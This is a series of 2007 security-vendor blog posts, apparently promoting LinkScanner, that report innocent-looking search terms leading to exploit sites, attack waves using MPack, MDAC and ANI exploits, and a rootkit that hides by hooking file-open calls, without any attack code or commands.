Dangerous searches - June 27, 2007

Hi folks,

It been a few days, and I thought I'd post the highlights. Over the last few days, it's been dangerous to search for such diverse things as ...

"music without voice" - WebAttacker2/ Mpack

"famous cubists" - WebAttacker/ MPack

"what is the regulation height of a dartboard" - believe it or not, this can get you a fake codec. Is nothing sacred?

"travel line buses sheffield" - MDAC

"polly pocket" - MDAC - no, nothing is sacred

"florida baptist churches" - nope, nothing.

"blank paper invitation pockets" - WebAttacker2/MPack

"web counter that works on myspace" - MDAC

and we don't usually care about p0rno queries, but this one is too funny to ignore...

"looney toon porn" .... whatever!

Cheers

Roger

Dangerous searches - June 23, 2007

Hi folks,

The overall state of play is that there are still two significant attack waves happening. The ecard guys out of the .hk domains have cleaned up their English and prettied up their email a bit. It's now downloading 2mb of something. We're not sure what it is at this point, but it's probably not friendly, and there are still lots of compromised Italian sites launching MPack/ WebAttacker2.

Here are some of the more interesting (and unexpected) dangerous search terms from the last couple of days...

"Firefox" ... ! Fortunately, that's only dangerous if you're using Internet Explorer to search for it.

"watch movies for free" ... wrong selection gets you a WebAttacker2/ Mpack.

"wallpaper" ... webattacker2/mpack

"blue book" ... is still dangerous. That's been about a week now, which is unusual. Most of these get cleaned up quite quickly.

"stem cell research"... that's a bit mean

"bulgarian mp3 music download" ... that's too easy (JUST KIDDING!)

and "radio blogs" ... wrong choice gets an MDAC.

Cheers

Roger

Dangerous searches - June 20, 2007

Hi folks,

I'd stopped tracking this stuff because I thought no one cared, but emails I've had off-list have convinced me otherwise. I think it's _really_ interesting to see what innocent searches can get you into trouble, and we're happy to share. I've also had the question off-list "Does this mean you track all your user's queries?" to which the answer is "Heck no!", but we do track the queries that result in exploit attempts. This is what we _do_. We couldn't care less who _you_ are and what queries _you_ make, but we sure want to know who tries to bite you! This is our job!

Here are the most interesting dangerous searches for the last few days...

"go karts" - wrong selection gets an MDAC exploit

almost any national park in the southwest is still dangerous, rattlesnakes not withstanding

"texas tea slots online" - wrong selection gets an MDAC

"insurance australia" - clearly that's dangerous ;-) ... the wrong result looks to be just an Orphaned Lure, but you can never be sure about Orphans.

"cannot find server" - clearly _that's_ dangerous! ... wrong selection gets a WebAttacker/ Mpack.

"top wallpapers" gets an MDAC

"free lottery" gets an Orphaned Lure

As someone famous once said "There's a million of them"

Of course, there are also _lots_ of Italian references which we don't understand, but which are hitting WebAttacker/ Mpacks.

Cheers

Roger

Two pretty good attack waves

Hi folks,

At the moment,it appears there are two determined but separate waves of attack underway. One involves a large number of hacked websites, seemingly in Italy, which are iframed and reaching back to an MPack/ WebAttacker exploit server (or servers), and the second is the continuing wave of allenged greeting cards, mostly from .hk domains. This second one is the one we blogged about over the weekend that uses an ani together with a circa-2005 exploit... sort of a sublime and a ridiculous thing simultaneously.

Of course, LinkScanner detects it all just fine.

Cheers

Roger

New attack underway

Hi folks,

There is a significant attack run underway over the weekend. It involves a spam run telling people they have a Greeting Card, not that this is a new tactic, but it involves a seemingly large number of .hk domains. If you click the link to view the card, it throws an ANI exploit, which is new-ish (patched in April 2007), and ms06-042, which is old-ish (patched in October 2006), and an ms05-052!!! I have no idea when that was patched except that it was 2005 sometime, and if someone has not patched since then... well... they have a name for people like that... serially pwned.

If it manages to nail you, it installs a downloader for which av detection is low, and it, in turn, downloads a rootkit for which av detection is _very_ low.

What this all means is that the weird thing is the use of a two year old exploit, that we have not seen in use anywhere else until now. Go figure.

If you're patched, or are running LinkScanner, all is well.

Cheers

Roger

Dangerous searches June 14th 2007

Hi folks,

Today it's dangerous to search for

atlas mountains country ... (wrong result gets you a WebAttacker 2 or MPack)

rotweiller rescue

North Padre Island (WebAttacker 2 or Mpack)

arches national park (WebAttacker 2 or MPack)

canyonlands national park (in fact, lots of National Parks in that part of the world ... the Badlands can still be dangerous)

and the mass lottery

Keep safe

Roger

Dangerous searches

Hi folks,

Today it's dangerous to search for

air disasters in Florida (wrong answer will get you a WebAttacker 2)

cd key windows xp profesional (that's another 'duh!')

and

batmobile for sale (does that need a comment?)

Mostly, it's a quiet day folks. Works for us.

:-)

Roger

Dangerous searches

Hi folks,

Today it's dangerous to search for ...

victoria's secret (duh! the wrong website here gets you a fake codec)

pokemon ruby gamesharks (I couldn't make this stuff up)

blue book (wrong website gets you an mdac exploit)

bulletin boards in norwich, ct (that'll get you an Orphaned Lure which might not be an orphan)

and .... music! (webattacker 2 or mpack)

:-)

Cheers

Roger

Dangerous searches

Hi folks,

Today it's dangerous to search for IBM stock, pallet fire (what's that???), Nigerian economic and financial crimes (there's a shock), and/ or to find out who's a rat.

It's left as an exercise to the Attentive Reader (tm) to find the exploitive websites. Anyone running the SearchShield function of LinkScanner should find it easy.

:-)

Cheers

Roger

A cunning rootkit

Ok, I see what they're doing now.

First some background ... Most rootkits _hide_ themselves from Windows api, and the anti-rootkits _find_ them by looking first with the normal Windows api, and then making another pass of the disk making calls directly to the kernel, and then comparing the lists. If they find a file in the second list that's not in the first, they report it as a hidden and there's a good chance it's a rootkit. This method is far from foolproof, because, for example, files might be legitimately created, say by a Browser, in between passes, and it will look like a hidden file, but it's good enough to provide a clue anyway.

What's happening with this one is that it is _not_ hidden. It sits in plain sight, and when the cross-viewing anti rootkits compare their lists, they get no differences, and therefore no hidden files, and most declare there to be no rootkit on the system.

Why is it a rootkit then? Instead of hooking the file list functions, they're hooking the _file open_ functions. If you try to view, or scan, or copy the contents of the rootkit, you get a "file does not exist" error!!! What this means is that even if your scanner has a signature for that rootkit, it probably won't be able to open the file anyway.

I dunno about you but I think that's pretty cunning!

Cheers

Roger

They swapped it out

That's interesting .... the St Petersburg Iframers have swapped out the new rootkit for something old and mouldy that everyone can detect!

One wonders when the new one will come back.

Cheers

Roger

Yahoo exploit In The Wild

Hi folks,

Recently a couple of exploits were announced for Yahoo Messenger Webcam dlls, and today there are websites actively using it to install malcode. We don't expect this to be an important or widespread outbreak, but we do expect it to be adopted by the rest of the malicious webmeisters over the next few weeks.

Naturally, we've added detection for it to LinkScanner.

Cheers

Roger

Keep those rootkits out

Hi folks,

The St Petersburg iframers have a new rootkit. None of the scanners that I have access to can put a name to it so far, and none of the generic cross-viewers that I have can see it, with the exception of GMER, and GMER isn't sure about it.

That these guys would have something new and difficult is not really surprising... they were using Rustock variants for a long time, which gave most anti virus/ anti spy products a hard time by storing themselves in an Alternate Data Stream and then hiding the ADS, but lots of av/as products can now see in the ADS. It's reasonable to assume they'd move to something newer.

Somewhat amusingly, they're still using the same exploits to plant it, so if you're patched and/or running LinkScanner, you have nothing to fear, but if you're not ... you don't want to get this one on your system.

Trust me ... it's better to keep them out than to try to remove them once they're in!

Cheers

Roger

At least they're honest about ripping you off...

Hi folks,

One of our users brought this to our attention. A bunch of websites are offering free web-counters. -start channeling Homer- Free? How could I go wrong? I'd have to be an idiot to pass that up. - end channeling Homer-

Well, if you read the Terms and Conditions, it contains this gem...

"Possible uses includes (but to are not limited to)
to directory of the sites using our service, the purpose situated
scripts inserted in your web can be used by us for every of profit,
general promotional uses, any purpose of profit, activx, pay Internet,
Dialer, Premium Number, redirect, etc."

Disregarding the poor English, at least they're telling you what they plan to do to you and your customers!

Read those EULAs folks!.

Cheers

Roger

You've got to like it ...

when you find the Bad Guys development sites. :-)

In the last three days, our researchers have found two such sites. We've already added sigs for their efforts. :-)

Seriously though, I'm fairly confident that we're going thru a quiet period, where the various groups are re-organizing themselves. Some good exploits have surfaced in the last couple of days, and some of them will find their way to websites in the next few weeks.

We'll be watching, and will keep you posted.

Cheers

Roger

Exploit-y news

Hi folks,

Thare are two developments worth mentioning.

First is that we are detecting increased usage of MS07-027. (MS07-027 patched several vulnerabilities, but the one we're seeing in use involves a dll called MDSAUTH which apparantly allows arbitrary file writing). The critical think about this is that it was only patched on May 8th, however, and the proof of concept code was released and available almost immediately, and it is certainly being used by the Chinese gangs. These guys have a habit of hacking large numbers of innocent websites and turning them into unwitting lures.

The second is that we are seeing _lots_ of activity involving the MPack exploit package (what we used to call WebAttacker 2). There are clearly large numbers of hacked websites involved here, and the exploit code works really well. This is the package that we've talked about before, and which contains lots of different exploits. The most dangerous are probably WinZip, because there is no automatic upgrade path for WinZip, and many people will still be using a vulnerable version, and the April 2007 animated cursor exploit, simply because it's so new. Many corporates will not be patched to April.

Cheers

Roger